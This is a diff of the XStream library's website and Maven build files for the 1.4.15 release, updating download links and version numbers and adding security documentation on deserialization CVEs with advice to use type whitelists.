27 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a>
2828 The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
29 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.14/xstream-hibernate-1.4.14.jar">XStream Hibernate module:</a></b>
29 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b>
3030 The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li>
31 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.14/xstream-jmh-1.4.14-app.zip">XStream JMH module:</a></b>
31 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b>
3232 The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li>
33 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14-java7/xstream-1.4.14-java7.jar">XStream Core for Java 7 only:</a>
34 The xstream.jar only <a href="faq.html#Compatibility_Android">without the Java 8 stuff</a> as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
3533 </ul>
3634
3735 <h1 id="maven">Maven Central Repository</h1>
4240 <div class="Source XML"><pre>&lt;dependency&gt;
4341 &lt;groupId&gt;com.thoughtworks.xstream&lt;/groupId&gt;
4442 &lt;artifactId&gt;xstream&lt;/artifactId&gt;
45 &lt;version&gt;1.4.14&lt;/version&gt;
43 &lt;version&gt;1.4.15&lt;/version&gt;
4644 &lt;/dependency&gt;</pre></div>
4745
4846 <h1 id="previous-releases">Previous Releases</h1>
7272
7373 <h1 id="news">Latest News</h1>
7474
75 <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
75 <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
7676
77 <p class="highlight">This maintenance release addresses the security vulnerability
78 <a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream
79 Plugin, an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security
80 framework.</p>
77 <p class="highlight">This maintenance release addresses the security vulnerabilities
78 <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
79 unmarshalling for XStream instances with uninitialized security framework.</p>
8180
82 <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
81 <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
8382
84 <p>Note, the next major release 1.5 will require Java 8.</p>
83 <p>Note, the next major release 1.5 will require Java 8.</p>
8584
8685 </body>
8786 </html>
1414 </head>
1515
1616 <body>
17
18 <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
19
20 <p class="highlight">This maintenance release addresses the security vulnerabilities
21 <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
22 unmarshalling for XStream instances with uninitialized security framework.</p>
23
24 <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
25
26 <p>Note, the next major release 1.5 will require Java 8.</p>
1727
1828 <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
1929
2828
2929 <p>The provided XML data is used by XStream to unmarshal Java objects. This data can be manipulated by injecting
3030 the XML representation of other objects, that were not present at marshalling time. An attacker could take
31 advantage of this to execute arbitrary code or shell commands in the context of the server running the XStream
32 process. A concrete case is described in <a href="CVE-2013-7285.html">CVE-2013-7285</a> and
33 <a href="CVE-2020-26217.html">CVE-2020-26217</a>.</p>
34
35 <p>Note that the XML data can be manipulated on different levels. For example, manipulating values on existing
36 objects (such as a price value), or breaking the format and causing the XML parser to fail. The latter case will
37 raise an exception, but the former case must be handled by validity checks in any application which processes
38 user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
31 advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the
32 context of the server running the XStream process. Concrete cases are described in
33 <a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>,
34 <a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p>
35
36 <p>Note, that the XML data can be manipulated on different levels. For example, manipulating values on existing
37 objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail.
38 The latter case will raise an exception, but the former case must be handled by validity checks in any application
39 which processes user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
3940 Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine
4041 causing a Denial of Service.</p>
4142
6364         
6465 <p>More scenarios have been identified for types that are already delivered with the Java runtime. Looking at
6566 well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more
66 exploits is very high.</p>
67
68 <p class="hightlight">Therefore creates a black list for special classes only a scenario for a false security,
69 because no-one can assure, that no other scenario arise. A better approach is a whitelist i.e. the allowed class
70 types are setup explicitly. This will be the default for XStream 1.5.x.</p>
67 exploits is very high. A class like InvokerTransformer of Apache Commons Collections has a high potential for
68 attacks.</p>
69
70 <p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security,
71 because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the
72 allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p>
7173
7274 <p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default. You have to
7375 explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to
9092 framework supports the setup of a blacklist or whitelist scenario. Any application should use this feature to
9193 limit the danger of arbitrary command execution if it deserializes data from an external source.</p>
9294
93 <p>XStream itself sets up a black list by default, i.e. it blocks all currently known critical classes of the Java
94 runtime. Main reason for the black list is compatibility, because otherwise newer versions of XStream 1.4.x can no
95 <p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java
96 runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no
9597 longer be used as drop-in replacement. Unfortunately this provides a false sense of security. Every XStream
9698 client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist
9799 as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer
120122 <p>Noted above, it might be possible that other combinations are found with the Java runtime itself, or other
121123 commonly-used Java libraries that allow a similar vulnerability like the known case using the Java Beans
122124 EventHandler. To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework,
123 allowing application developers to define which types are allowed to be unmarshalled with XStream.</p>
125 allowing application developers to define which types are allowed to be unmarshalled with XStream. Use
126 <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a>
127 to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p>
124128         
125129 <p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>.
126130 The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list
00 <!--
11 Copyright (C) 2005, 2006 Joe Walnes.
2 Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016 XStream committers.
2 Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers.
33 All rights reserved.
44
55 The software in this package is published under the terms of the BSD
4444 </section>
4545 <section>
4646 <name>Vulnerabilities</name>
47 <page>CVE-2020-26259.html</page>
48 <page>CVE-2020-26258.html</page>
4749 <page>CVE-2020-26217.html</page>
4850 <page>CVE-2017-7957.html</page>
4951 <page>CVE-2016-3674.html</page>
1212 <parent>
1313 <groupId>com.thoughtworks.xstream</groupId>
1414 <artifactId>xstream-parent</artifactId>
15 <version>1.4.14</version>
15 <version>1.4.15</version>
1616 </parent>
1717 <artifactId>xstream-hibernate</artifactId>
1818 <packaging>jar</packaging>
1212 <parent>
1313 <groupId>com.thoughtworks.xstream</groupId>
1414 <artifactId>xstream-parent</artifactId>
15 <version>1.4.14</version>
15 <version>1.4.15</version>
1616 </parent>
1717 <artifactId>xstream-jmh</artifactId>
1818 <packaging>jar</packaging>